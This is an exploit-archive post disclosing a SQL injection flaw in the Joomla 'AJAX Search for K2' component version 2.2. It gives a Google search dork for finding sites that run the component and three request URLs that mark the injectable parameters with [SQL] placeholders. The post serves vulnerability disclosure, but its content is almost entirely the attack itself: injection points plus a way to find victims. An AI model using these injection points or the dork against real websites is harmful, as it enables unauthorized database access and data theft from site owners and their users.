# # # # # # Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection # Google Dork: inurl:index.php?option=com_k2ajaxsearch # Date: 24.02.2017 # Vendor Homepage: http://taleia.software/ # Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/ # Demo: http://k2ajaxsearch.taleia.software/demo/ # Version: 2.2 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL] # http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL] # http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan # # # # #